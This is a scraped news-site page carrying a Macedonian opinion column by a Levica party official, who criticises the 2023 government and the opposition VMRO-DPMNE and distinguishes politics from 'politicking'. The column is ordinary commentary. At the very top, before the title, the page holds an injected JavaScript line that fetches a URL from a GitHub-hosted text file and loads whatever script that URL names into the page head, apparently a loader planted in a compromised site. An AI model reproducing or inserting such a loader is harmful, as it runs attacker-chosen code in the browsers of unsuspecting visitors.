;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Слезенковски: Политика или политиканство? - Антропол
АктуелноЛокалноСтав

Слезенковски: Политика или политиканство?

Пишува: Слезенковски Кирил – член на Централниот комитет при политичката партија Левица

Политиката треба да претставува група на луѓе која заеднички носи одлуки од секаков тип. 
Во нашиот случај водењето на политика треба да биде заедничкото носење на одлуки преку извршната власт со цел подобрување на стандардот, просперитетот и безбедноста на живеењето.

2023 година ја одбележаа неколку скандали и тоа: Онкологија, Судскиот Совет, договорот со Бехтел и Енка, 78% покачени плати за функционерите, измени во Кривичниот законик и убиството на Вања и Панче.

Владата знаеме како функционира со 62 пратеника кои едвај се држат на број само да останат подолго на власт со цел да ја украдат и последната тронка надеж на една млада личност која има за цел да остане и дејствува во државава.
Непревземајки никакви мерки и чекори за подобрување на состојбата или разрешување на некои од горенаведените скандали спроведуваат обично политиканство со цел да ја замае јавноста. 

Опозицијата (дпмне) силно влезена во порите на јавните институции и контролирањето на мнозинството општини низ Републиката, 2023 година ја одбележа без конкретни мерки и политики кои би биле во интерес на самата држава и граѓаните.
Премолчувањето и неподдржувањето на протестите за Онкологија, неподдржувањто на протестите за повисоки пензии, зголемени плати (каде ги опфаќа и нивните функционери), давањето на поддршка за изгласувањето на Кривичниот законик само ни дава за дознание дека во Македонија недостига водење на политика.

Недостигаат точни ставови и барања од страна на ДПМНЕ за сите општествени дејности. Но како да бараат кога и тие самите се дел од овој трул систем кој полека но сигурно станува неподнослив на живеење?

Како да водат политика кога се дел од спроведувањето на лоши одлуки и закони од страна на Владата?

Како да водат политика кога самите тие ни ја избркаа младината во странство?

Како да очекуваме подобро утре кога единствена цел е да се дојде на власт, но не да се подобри општата состојба на сите граѓани, туку да се подобри само на оние – послушните.

Иако политиканството и политиката звучат исто, тие се тотално различни поими каде првиот нажалост завзема се поголем замав на политичката сцена во Македонија.